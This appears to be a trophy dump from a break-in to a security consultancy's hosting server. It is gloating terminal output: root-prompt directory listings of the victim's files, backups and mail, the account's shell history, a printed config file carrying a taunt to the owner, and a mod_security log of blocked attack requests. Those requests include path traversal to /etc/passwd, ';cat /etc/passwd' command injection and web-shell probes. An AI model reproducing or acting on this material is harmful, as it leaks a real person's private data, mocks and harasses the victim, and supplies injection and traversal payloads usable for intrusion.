-rwxr-xr-x  1 mitsec mitsec	 99001 Nov 21  2007 clid.tar.gz
-rwxr-xr-x  1 mitsec mitsec	 50838 Jun 20 03:10 contact_form.php
drwxr-xr-x  4 mitsec mitsec	  4096 Sep  1  2008 cpanel3-skel
-rwxr-xr-x  1 mitsec mitsec	     1 Jan 20 22:01 cpbackup-exclude.conf
drwxr-xr-x  2 mitsec mitsec	  4096 Mar 18 00:19 cpmove.psql
drwxr-xr-x  3 mitsec mitsec	  4096 Sep  1  2008 cpmove.psql.1220367507
drwxr-xr-x  3 mitsec mitsec	  4096 Sep  2  2008 cpmove.psql.1237665475
-rwxr-xr-x  1 mitsec mitsec	238515 Aug 19  2007 error_log
-rwxr-xr-x  1 mitsec mitsec   72854668 Aug  3  2008 error_log.txt
drwxr-x--- 14 mitsec mail	  4096 Oct 23  2008 etc
-rwxr-xr-x  1 mitsec mitsec	 33449 Nov 24  2007 etcasterisk.tar.gz
-rwxr-xr-x  1 mitsec mitsec   74625550 Oct 20  2007 files.zip
-rwxr-xr-x  1 mitsec mitsec   17912486 Apr 18  2007 for-faa.zip
-rwxr-xr-x  1 mitsec mitsec	 35938 Apr  6  2007 httpd.conf
-rwxr-xr-x  1 mitsec mitsec	 35186 Apr  6  2007 httpd.conf.rpmnew
-rwxr-xr-x  1 mitsec mitsec    1515582 Nov 12  2006 issa.jpg
-rwxr-xr-x  1 mitsec mitsec	     0 Aug 29  2006 landesk.ppt
-rwxr-xr-x  1 mitsec mitsec	     0 Aug 29  2006 landesk1.ppt
-rwxr-xr-x  1 mitsec mitsec	     0 Aug 29  2006 landesk2.ppt
drwxr-xr-x  2 mitsec mitsec	  4096 Aug 13  2007 logs
drwxrwx--- 10 mitsec mitsec	  4096 Mar 21 14:35 mail
-rwxr-xr-x  1 mitsec mitsec   38559604 Apr 25  2005 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec   18084536 Apr 18  2007 mitnickpromo2.wmv
-rwxr-xr-x  1 mitsec mitsec	600292 Aug  7  2007
mitsec_mitsecmscontact.csv.zip
-rwxr-xr-x  1 mitsec mitsec	616494 Aug  7  2007
mitsec_mitsecmscontact.sql.zip
-rwxr-xr-x  1 mitsec mitsec	693914 Aug  7  2007
mitsec_mitsecmscontact.xls.zip
-rwxr-xr-x  1 mitsec mitsec	  1506 Apr  4  2007 mod_security.conf
drwxr-xr-x  5 mitsec mitsec	  4096 Sep  1  2008 moved
-rwxr-xr-x  1 mitsec mitsec	  9457 Nov 18  2006 presentations.php
drwxr-xr-x  3 mitsec mitsec	  4096 Mar 21 14:34 public_ftp
drwxr-xr-x 24 mitsec nobody	  4096 Jul  9 10:01 public_html
-rwxr-xr-x  1 mitsec mitsec	 11274 Apr  4  2007 ssl.conf
drwxr-xr-x  2 mitsec mitsec	  4096 Jan 30  2008 stuff
drwxr-xr-x  7 mitsec mitsec	  4096 Oct 10  2008 tmp
-rwxr-xr-x  1 mitsec mitsec   30189757 Nov 24  2007 varlib.tar.gz
-rwxr-xr-x  1 mitsec mitsec	 66023 Jun 19 21:23 websitephp.tar.gz
lrwxrwxrwx  1 mitsec mitsec	    11 Jul  7 19:18 www -> public_html
drwxr-xr-x  2 mitsec mitsec	  4096 Nov 12  2006 zzhp
-rwxr-xr-x  1 mitsec mitsec	 61314 Jun 19 22:03 zzhp.tar.gz
root@dc21 [~]# cat .bash_history
exit
ps aux
ps aux
users
who
cd ../
ls
cd ../
ls
cd bin
ls
cd ../
ls
ls
cd home
ls
cd ../
cd etc
ls
last
vi host.conf
ls
vi shadow
vi passwd
cd /usr
cd local
cd pcanel
cd cpanel
ls
cd bin
ls
./rkhunter
cd ../
ls
cd ../../
cd ../
ls
cd home
ls
cd mitsec/
ls
vi error_log
cat error_log
ls -la
vi .bash_history
vi .bash_history
vi httpd.conf
vi .contactemail
vi .dns
cd logs
ls
cd ../
ls
vi mod_security.conf
cd access-logs
last
cd /var/log
ls
vi messages
vi wtmp
cd ../
cd ../
last -a
last -a
psaux
psaux
p[s aux; exit; q
ps aux
ps aux
cd /scripts
ls
./checkvirtfs 
vi checkvirtfs 
cd opt
ls
cd ../
cd var
ls
cd ../
ls
last
last -a
netstat -an
netstat
netstat -an
tcp	   0   6224 ::ffff:69.65.59.78:3442	::ffff:67.169.204.62:33145 
ESTABLISHED
netstat -an | grep -i estab
mitsec@mitnicksecurity.com [/]# netstat -an | grep -i estab
Active Internet connections (servers and established)
tcp	   0	177 69.65.59.78:25		88.102.181.144:2320	   
ESTABLISHED
tcp	   0	  0 69.65.59.78:80		124.125.89.117:55412	   
ESTABLISHED
tcp	   0	  0 69.65.59.78:80		124.125.89.117:55413	   
ESTABLISHED
tcp	   0	  0 69.65.59.78:80		124.125.89.117:55153	   
ESTABLISHED
tcp	   0	  0 69.65.59.78:80		124.125.89.117:55416	   
ESTABLISHED
tcp	   0	  0 69.65.59.78:58434		65.254.36.154:21	   
ESTABLISHED
tcp	   0  51840 69.65.59.78:38345		65.254.36.154:49565	   
ESTABLISHED
tcp	   0	 52 ::ffff:69.65.59.78:3442	::ffff:67.169.204.62:33145 
ESTABLISHED
Active UNIX domain sockets (servers and established)
mitsec@mitnicksecurity.com [/]#
netstat -an | grep 67.169.204.62
netstat -an
98.99.158.166tcp	0      0 ::ffff:69.65.59.78:3442    
::ffff:98.99.158.166:64118  ESTABLISHED
netstat -an
users
who
netstat -an
netstat -an | grep .248
netstat -an
netstat -an | gep 67.214.58.248
netstat -an | grep 67.214.58.248
netstat
netstat | grep 67.214.58.248
netstat -an
last
last -a
netstat | grep 216.245.214.108
last
exit
cd public_html/
ls -tal | more
exit
ls
cd mail
ls -lta
ls new
cd new
cat *
cd ..
ls
ls -lta
ls -l cur
ls -l mitnicksecurity.com/
ls -latR | more
ls
cd mitnicksecurity.com/
cd kmitnick/
ls
ls cur
cd new
ls
more *
cd ..
cd ..
cd ..
ls
w
last mitsec
exit
ls
cd www/
ls
ls c*
cd
ls
cd public_
cd public_html/
ls
vi contact_form.php 
exitroot@dc21 [~]# ls -al
total 10085472
drwxr-xr-x 22 mitsec mitsec	  4096 Jul 16 10:36 .
drwxr-xr-x 12 root   root	  4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec	    64 Mar 20  2007 .Xauthority
-rwxr-xr-x  1 mitsec mitsec	  2399 Jul  9 10:01 .bash_history
-rwxr-xr-x  1 mitsec mitsec	    24 Feb 25  2006 .bash_logout
-rwxr-xr-x  1 mitsec mitsec	   191 Feb 25  2006 .bash_profile
-rwxr-xr-x  1 mitsec mitsec	   124 Feb 25  2006 .bashrc
-rwxr-xr-x  1 mitsec mitsec	  5619 Aug 21  2006 .canna
-rwxr-xr-x  1 mitsec mitsec	    17 Jan 30  2006 .contactemail
-rwxr-xr-x  1 mitsec mitsec	    10 Jan 30  2006 .contactsavetime
drwxr-xr-x  5 mitsec mitsec	  4096 Mar 21 12:58 .cpanel
-rwxr-xr-x  1 mitsec mitsec	  1682 Jan 23  2005 .cpanel-ducache
-rwxr-xr-x  1 mitsec mitsec	    19 Jul 17 10:46 .dns
-rwxr-xr-x  1 mitsec mitsec	   383 Aug 21  2006 .emacs
drwxr-xr-x  5 mitsec mitsec	  4096 Sep  1  2008 .fantasticodata
-rwxr-xr-x  1 mitsec mitsec	    16 Jul  2 23:11 .ftpquota
drwxr-xr-x  2 mitsec mitsec	  4096 Sep  1  2008 .gnupg
drwxr-xr-x 52 mitsec nobody	  4096 Sep  1  2008 .htpasswds
-rwxr-xr-x  1 mitsec mitsec	     7 Sep  2  2008 .lang
-rw-------  1 mitsec mitsec	    14 Jul 16 10:22 .lastlogin
-rwxr-xr-x  1 mitsec mitsec	    35 Jan 13  2009 .lesshst
-rwxr-xr-x  1 mitsec mitsec    6441532 May  6  2006
.pureftpd-upload.445d6ea6.15.1358.7997c79e
drwxr-xr-x  2 mitsec mitsec	  4096 Sep  1  2008 .sqmaildata
drwxr-xr-x  2 mitsec mitsec	  4096 Sep  1  2008 .ssh
drwxr-xr-x  2 mitsec mitsec	  4096 Mar 28  2007 .trash
-rwxr-xr-x  1 mitsec mitsec	   705 Feb 28  2008 .viminfo
-rwxr-xr-x  1 mitsec mitsec	     5 Mar  5  2006 .whmtheme
-rwxr-xr-x  1 mitsec mitsec	   658 Aug 21  2006 .zshrc
-rwxr-xr-x  1 mitsec mitsec    1361309 Mar  7  2008 CDMA WORKSHOP.rar
-rwxr-xr-x  1 mitsec mitsec   73025457 Mar 20  2007 MitnickDemo.wmv
-rwxr-xr-x  1 mitsec mitsec   20152320 Mar  7  2008 SOFTWARE PACK.rar
-rwxr-xr-x  1 mitsec mitsec	 49569 Mar  7  2008 UNIBOX.rar
lrwxrwxrwx  1 mitsec mitsec	    32 Jul  7 19:34 access-logs ->
/usr/local/apache/domlogs/mitsec
-rwxr-xr-x  1 mitsec mitsec  582461440 Aug  7  2007 archive.tar
-rwxr-xr-x  1 mitsec mitsec	607360 Sep  4  2007 arcot.ppt
-rwxr-xr-x  1 mitsec mitsec   30242339 Jul 25  2007
asterisk-1.0.8-backup-2007-07-25.tar.gz
-rwxr-xr-x  1 mitsec mitsec 2189910925 Oct 25  2007
backup-10.25.2007_23-54-41_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264566004 Jul 16 10:35
backup-7.16.2009_10-22-58_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264029970 Jul  8 16:51
backup-7.8.2009_16-39-47_mitsec.tar.gz
-rwxr-xr-x  1 mitsec mitsec  617186883 Aug 19  2007 backup-8.19.2007.tar.gz
-rwxr-xr-x  1 mitsec mitsec	 90279 Nov  6  2006 badboys.mp3
-rwxr-xr-x  1 mitsec mitsec	   211 May  5  2007 boot.ini
-rwxr-xr-x  1 mitsec mitsec    5305344 Feb  7  2007 circosec-FINAL.ppt
-rwxr-xr-x  1 mitsec mitsec    5299200 Jan  8  2007 circosec.ppt
-rwxr-xr-x  1 mitsec mitsec	 99001 Nov 21  2007 clid.tar.gz
-rwxr-xr-x  1 mitsec mitsec	 50838 Jun 20 03:10 contact_form.php
drwxr-xr-x  4 mitsec mitsec	  4096 Sep  1  2008 cpanel3-skel
-rwxr-xr-x  1 mitsec mitsec	     1 Jan 20 22:01 cpbackup-exclude.conf
drwxr-xr-x  2 mitsec mitsec	  4096 Mar 18 00:19 cpmove.psql
drwxr-xr-x  3 mitsec mitsec	  4096 Sep  1  2008 cpmove.psql.1220367507
drwxr-xr-x  3 mitsec mitsec	  4096 Sep  2  2008 cpmove.psql.1237665475
-rwxr-xr-x  1 mitsec mitsec	238515 Aug 19  2007 error_log
-rwxr-xr-x  1 mitsec mitsec   72854668 Aug  3  2008 error_log.txt
drwxr-x--- 14 mitsec mail	  4096 Oct 23  2008 etc
-rwxr-xr-x  1 mitsec mitsec	 33449 Nov 24  2007 etcasterisk.tar.gz
-rwxr-xr-x  1 mitsec mitsec   74625550 Oct 20  2007 files.zip
-rwxr-xr-x  1 mitsec mitsec   17912486 Apr 18  2007 for-faa.zip
-rwxr-xr-x  1 mitsec mitsec	 35938 Apr  6  2007 httpd.conf
-rwxr-xr-x  1 mitsec mitsec	 35186 Apr  6  2007 httpd.conf.rpmnew
-rwxr-xr-x  1 mitsec mitsec    1515582 Nov 12  2006 issa.jpg
-rwxr-xr-x  1 mitsec mitsec	     0 Aug 29  2006 landesk.ppt
-rwxr-xr-x  1 mitsec mitsec	     0 Aug 29  2006 landesk1.ppt
-rwxr-xr-x  1 mitsec mitsec	     0 Aug 29  2006 landesk2.ppt
drwxr-xr-x  2 mitsec mitsec	  4096 Aug 13  2007 logs
drwxrwx--- 10 mitsec mitsec	  4096 Mar 21 14:35 mail
-rwxr-xr-x  1 mitsec mitsec   38559604 Apr 25  2005 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec   18084536 Apr 18  2007 mitnickpromo2.wmv
-rwxr-xr-x  1 mitsec mitsec	600292 Aug  7  2007
mitsec_mitsecmscontact.csv.zip
-rwxr-xr-x  1 mitsec mitsec	616494 Aug  7  2007
mitsec_mitsecmscontact.sql.zip
-rwxr-xr-x  1 mitsec mitsec	693914 Aug  7  2007
mitsec_mitsecmscontact.xls.zip
-rwxr-xr-x  1 mitsec mitsec	  1506 Apr  4  2007 mod_security.conf
drwxr-xr-x  5 mitsec mitsec	  4096 Sep  1  2008 moved
-rwxr-xr-x  1 mitsec mitsec	  9457 Nov 18  2006 presentations.php
drwxr-xr-x  3 mitsec mitsec	  4096 Mar 21 14:34 public_ftp
drwxr-xr-x 24 mitsec nobody	  4096 Jul  9 10:01 public_html
-rwxr-xr-x  1 mitsec mitsec	 11274 Apr  4  2007 ssl.conf
drwxr-xr-x  2 mitsec mitsec	  4096 Jan 30  2008 stuff
drwxr-xr-x  7 mitsec mitsec	  4096 Oct 10  2008 tmp
-rwxr-xr-x  1 mitsec mitsec   30189757 Nov 24  2007 varlib.tar.gz
-rwxr-xr-x  1 mitsec mitsec	 66023 Jun 19 21:23 websitephp.tar.gz
lrwxrwxrwx  1 mitsec mitsec	    11 Jul  7 19:18 www -> public_html
drwxr-xr-x  2 mitsec mitsec	  4096 Nov 12  2006 zzhp
-rwxr-xr-x  1 mitsec mitsec	 61314 Jun 19 22:03 zzhp.tar.gz
root@dc21 [~]# cd www/; ls -la
total 82928
drwxr-xr-x 24 mitsec nobody	4096 Jul  9 10:01 .
drwxr-xr-x 22 mitsec mitsec	4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec	 629 Feb 26 14:36 .htaccess
-rwxr-xr-x  1 mitsec mitsec   729350 Aug  7  2007 CSC-Testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec  1194067 May 12  2008
FBI_Pretexts_and_Cover_Techniques_May-1956.pdf
-rwxr-xr-x  1 mitsec mitsec  2547699 Aug  7  2007 Mitnick_Playboy_feature.pdf
-rwxr-xr-x  1 mitsec mitsec   687114 Nov 15  2008 PsychologyToday1208.pdf
-rwxr-xr-x  1 mitsec mitsec   117138 Mar  1  2008 US-pretrial.pdf
-rwxr-xr-x  1 mitsec mitsec	1038 Oct 20  2007 _contact_settings.php
-rwxr-xr-x  1 mitsec mitsec	 528 Jan 18 16:26 _footer.php
-rwxr-xr-x  1 mitsec mitsec	3133 Aug  7  2007 _header.php
-rwxr-xr-x  1 mitsec mitsec	1380 Mar 28  2005 _news_frontpage.php
-rwxr-xr-x  1 mitsec mitsec    18277 Jun 28 15:20 _sidebar.php
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 alexkasper
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 amc
-rwxr-xr-x  1 mitsec mitsec 37314215 Oct 20  2007 amc.zip
-rwxr-xr-x  1 mitsec mitsec	2798 Aug  7  2007 aoi_reviews.php
drwxr-xr-x  2 mitsec mitsec	4096 Oct 24  2008 blittle
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 cgi-bin
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 cialdini
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 circosec
drwxr-xr-x  2 mitsec mitsec	4096 May 15 01:46 clid
-rwxr-xr-x  1 mitsec mitsec	2870 Aug  7  2007 company.php
-rwxr-xr-x  1 mitsec mitsec	2462 Jan 13  2006 config.php
drwxr-xr-x  4 mitsec mitsec	4096 Sep  1  2008 contact-admin
-rwxr-xr-x  1 mitsec mitsec	2216 Aug  7  2007 contact-old.php
-rwxr-xr-x  1 mitsec mitsec	2174 Mar 19  2007 contact-saved.php
-rwxr-xr-x  1 mitsec mitsec	1662 Aug 26  2007 contact.php
-rwxr-xr-x  1 mitsec mitsec    22744 Nov 16  2006 contact.php.bk
-rwxr-xr-x  1 mitsec mitsec    22519 Nov 13  2006 contact.php.save
-rwxr-xr-x  1 mitsec mitsec	1054 Aug  7  2007 contact_confirmation.php
-rwxr-xr-x  1 mitsec mitsec    50576 Jun 20 03:17 contact_form.matt
-rwxr-xr-x  1 mitsec mitsec    50245 Jun  9 15:45 contact_form.oldform
-rwxr-xr-x  1 mitsec mitsec    50806 Jul  9 09:53 contact_form.php
-rwxr-xr-x  1 mitsec mitsec	1988 Dec  7  2006 contact_new.php.bk
-rwxr-xr-x  1 mitsec mitsec	8021 Nov 16  2006 contact_submit.php.bk
drwxr-xr-x  3 mitsec mitsec	4096 Feb 26 14:36 defthi
drwxr-xr-x  5 mitsec mitsec	4096 Sep  1  2008 dev
drwxr-xr-x  3 mitsec mitsec	4096 Sep  1  2008 elsag
-rwxr-xr-x  1 mitsec mitsec	1613 Jan 13  2006 error.gif
-rwxr-xr-x  1 mitsec mitsec   384144 Aug  7  2007 faa.pdf
-rwxr-xr-x  1 mitsec mitsec	3897 Mar 28  2005 feeds.php
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 flash
-rwxr-xr-x  1 mitsec mitsec	4859 Aug 22  2006 generateimage.php
-rwxr-xr-x  1 mitsec mitsec	  23 Nov 20  2006 googlehostedservice.html
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 guillermo
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 images
-rwxr-xr-x  1 mitsec mitsec    12083 Mar  5  2007 index-save.php
-rwxr-xr-x  1 mitsec mitsec	5394 May 18 17:28 index.php
-rwxr-xr-x  1 mitsec mitsec    12077 Nov 26  2006 index.php.save
-rwxr-xr-x  1 mitsec mitsec	 385 Mar 21 17:59 info.txt
-rwxr-xr-x  1 mitsec mitsec	1440 Aug  7  2007 investigations.php
-rwxr-xr-x  1 mitsec mitsec  1515582 Aug  7  2007 issa.jpg
drwxr-xr-x  3 mitsec mitsec	4096 Jun 20 03:16 jon
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 keppler
-rwxr-xr-x  1 mitsec mitsec	8793 Aug  7  2007 lastRSS.php
drwxr-xr-x  2 mitsec mitsec	4096 Jan 20 16:51 media
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 mitnick
-rwxr-xr-x  1 mitsec mitsec 38559604 Aug 20  2006 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec	5089 Jan 13  2006 msc.css
drwxr-xr-x  3 mitsec mitsec	4096 Sep  1  2008 news
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 patrickau
-rwxr-xr-x  1 mitsec mitsec  1088600 Oct 27  2008 pdi-testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec	7120 Aug  7  2007 presentations.php
-rwxr-xr-x  1 mitsec mitsec	9188 Jun 28 15:21 press.php
-rwxr-xr-x  1 mitsec mitsec	3487 Mar 28  2005 privacy.php
-rwxr-xr-x  1 mitsec mitsec	3111 Aug  7  2007 products.php
-rwxr-xr-x  1 mitsec mitsec	1200 Aug 13  2007 resources.php
-rwxr-xr-x  1 mitsec mitsec	8172 Aug  7  2007 services.php
-rwxr-xr-x  1 mitsec mitsec	5218 Aug 13  2007 speaking.php
-rwxr-xr-x  1 mitsec mitsec	4975 Sep 29  2006 speakingold.php
-rwxr-xr-x  1 mitsec mitsec    28169 Aug  7  2007 ssa.pdf
-rwxr-xr-x  1 mitsec mitsec	2430 Aug  7  2007 style.css
-rwxr-xr-x  1 mitsec mitsec	5731 May 18 17:28 testimonials.php
drwxr-xr-x  2 mitsec mitsec	4096 Sep  1  2008 ttf
-rwxr-xr-x  1 mitsec mitsec	2726 Oct 20  2007 verify_config.php
-rwxr-xr-x  1 mitsec mitsec	3928 Mar 24 17:08 video.php
-rwxr-xr-x  1 mitsec mitsec	5857 Aug 22  2006 wallofshame.txt
-rwxr-xr-x  1 mitsec mitsec	3034 Aug 26  2007 workshop_signup.php
-rwxr-xr-x  1 mitsec mitsec    20981 Nov 16  2006 workshop_signup.php.bk
-rwxr-xr-x  1 mitsec mitsec	 888 Aug  7  2007
workshop_signup_confirmation.php
-rwxr-xr-x  1 mitsec mitsec	3305 Dec  7  2006 workshop_signup_new.php.bk
-rwxr-xr-x  1 mitsec mitsec	5373 Nov 16  2006 workshop_signup_submit.php.bk
-rwxr-xr-x  1 mitsec mitsec	1208 Aug  7  2007 workshops.php
drwxr-xr-x  8 mitsec mitsec	4096 Sep  1  2008 zzhp
root@dc21 [~]# cat wallofshame.txt
Requesting IP Date Time Handler GET Host Mod_Security-Message
Mod_Security-Action 
167.216.252.40 2006-08-22 11:20:05 
/images/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern
match "/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:20:03 cgi-script  9b.4d.344a.static.theplanet.com
Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:20:02  /phpxmlrpc/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"xmlrpc" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:20:01  /xmlrpc/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"xmlrpc" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:59 cgi-script
/images/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:57 cgi-script /webmail/rwwwshell.pl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"shell\\.pl" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:56 cgi-script
/webmail/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:56 cgi-script
/webmail/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:55 cgi-script
/webmail/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:54 cgi-script
/webmail/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:52  /images/perl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"perl " at THE_REQUEST 403 
167.216.252.40 2006-08-22 11:19:49 cgi-script /webmail/.htaccess HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"\\.htaccess" at THE_REQUEST 403 
167.216.252.40 2006-08-22 11:19:39  /phpMyAdmin-2.6.4/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:38  /phpMyAdmin-2.6.4-pl1/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:38  /phpMyAdmin264/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:36 cgi-script /images/rwwwshell.pl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"shell\\.pl" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:35 cgi-script
/images/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:35 cgi-script
/images/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:34 cgi-script
/images/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:33 cgi-script
/images/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:22 
/nqt.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/passwd&Submi
t=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403.
Pattern match "/etc/passwd" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:20 
/network_query.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/pa
sswd&Submit=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with
code 403. Pattern match "img src=javascript" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:18  /nph-cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:18  /cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:17  /cgiwrap/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:16  /nph-cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403 
167.216.252.40 2006-08-22 11:19:16  /cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403 
167.216.252.40 2006-08-22 11:19:15  /cgiwrap/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403 
167.216.252.40 2006-08-22 11:19:04  /phpMyAdmin/css/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403 
167.216.252.40 2006-08-22 11:19:04  /phpmyadmin/css/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403 


root@dc21 [~]# #lolroot@dc21 [~]# cat config.php
<script language="php"> ## rofl, come join us in 2009 Kev.
// LICENSE NOTE,  This software is dual licensed using BSD-Style and LGPL.
Where there is any discrepancy, the BSD-Style license will take precedence.
// Review the relative file ./license.txt for details.	The intention is that
these works are available for all
// and may be profited from but not restricted in use.
// For most recent see
http://www.cocoavillagepublishing.com/development/tools/php/scripts/
// NOTE - TO AVOID "Cannot send session cache limiter - headers already sent"
// try to avoid blank lines and tabs to minimize chance header starts premature
by web output
// 
// Defining some settings with variables
//
// $BAS_mode="";  blank means nominal, if "test" then we evoke more scripts
//$BAS_mode="test" ;
$BAS_mode="";
//
// Important, number of characters in image, suggest 4
$BASnumimgchars = 4 ;  
//
// set $BASaddimgnoise = "yes" for arcs and noise to be added to image to
further confuse ocr
$BASaddimgnoise = "no";
//$BASaddimgnoise = "yes" ;
//
// IF entered code matches random generated string, after action will redirect
page
// to this location using php header function.	Scripting code so header will
use
// relative location per notes at
http://us2.php.net/manual/en/function.header.php
$MatchSendToRelativeURL="good_submission.html" ;
//
// Action for good match, for now the function sends an email, which should be
// a secret or a priority like email to pager of fax....
$BAS_secretemail="blockautosubmit@webengr.com" ;
//
// Fromemail for notificationsof successful submissions, 
$BAS_fromemail = "www@".$_SERVER['HTTP_HOST'] ;
//
//
//
//
//******************************************//
//  BELOW YOU PROBABLY WILL NOT BE CHANGING //
//******************************************//
//
// declare some functions to be used in places 
// function to return random characters for image
function GetRandomChar() {
	// Seed with microseconds since last "whole" second
	mt_srand((double)microtime()*1000000);
	// Use random number 1-3, if 1, we generate a number 0-9 (ascii 48 to
57), 
	// if it was 2, we generate an uppercase character (ascii 65 to 70),
	// if it was 3, we generate a lowercase character (ascii 97 to 122),
	switch (mt_rand(1,3)) {
	case 1:
		$BAErandchar = mt_rand(48, 57);
		break;
	case 2:
		$BAErandchar = mt_rand(65, 90);
		break;
	case 3:
		    $BAErandchar = mt_rand(97, 122); 
		break;
		}	
	return chr($BAErandchar);
	}
//
//
//
</script>
root@dc21 [~]# ls -la media/ ## we know u luv it k3v1n
total 1292888
drwxr-xr-x  2 mitsec mitsec	4096 Jan 20 16:51 .
drwxr-xr-x 24 mitsec nobody	4096 Jul  9 10:01 ..
-rwxr-xr-x  1 mitsec mitsec  1780588 Jan 20  2006 2005 FBI Computer Crime
Survey Report.pdf
-rwxr-xr-x  1 mitsec mitsec    50950 Aug  7  2007 41stParamete2.pdf
-rwxr-xr-x  1 mitsec mitsec 22324052 Jan 17  2005 60mins.wmv
-rwxr-xr-x  1 mitsec mitsec 83791947 Feb  6  2008 AMW.mp4
-rwxr-xr-x  1 mitsec mitsec 67229236 Feb  8  2008 AMW.wmv
-rwxr-xr-x  1 mitsec mitsec   115766 Jul 15  2006
AppSense-White-Paper-Mitnick.pdf
-rwxr-xr-x  1 mitsec mitsec    46238 Aug  7  2007 Applied_Scan2.pdf
-rwxr-xr-x  1 mitsec mitsec 99973354 Feb  6  2008 Bloomberg1.mp4
